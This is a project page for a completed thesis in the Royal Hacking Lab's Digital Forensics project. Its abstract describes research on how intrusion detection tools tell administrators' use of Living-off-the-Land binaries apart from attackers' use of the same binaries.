- Supervisors: Dr. Emre Süren | Teodor Sommestad
- Author: Peter Daniel
- Status: completed 🟠
- Started: 2024-08
- Ended: 2025-07
Parent project: Digital Forensics
A notable trend among malicious actors in the threat landscape is the adoption of Living-off-the-Land (LotL) binaries -- legitimate system utilities already present in the system -- as a defense evasion mechanism. The dual usage of these techniques by administrators and attackers alike have blurred the line between benign and malicious activities, triggering numerous false alarms in Intrusion Detection Systems (IDS), diminishing their efficacy and overwhelming security teams. This thesis investigates the challenges of accurately distinguishing between legitimate and adversarial use of LotL techniques, focusing on how overlapping techniques impact IDS performance. To identify these intersecting LotL techniques, the study leveraged the MITRE ATT&CK® framework, the LOLBAS Project, and Sigma detection signatures, alongside interviews and surveys with practitioners. A subset of administrative tasks that resemble adversarial behaviors were automated and simulated in the Cyber Range And Training Environment (CRATE), while the Atomic Red Team framework was used to emulate malicious actions. Testing for detection accuracy was evaluated using signature-based IDS tools, Snort, Sysmon and Wazuh. The findings show that despite using the same binaries and triggering identical signatures, there are subtle behavioral differences between benign and malicious usage of these binaries. Although all the activities generated by the simulations were captured by the security monitoring tools, contextual analysis was required to further distinguish between the two activities. Key recommendations include detection signature refinement and incorporating contextual analysis and anomaly detection to enhance IDS capabilities.
This project run by the Royal Hacking Lab within the Cybercampus Sverige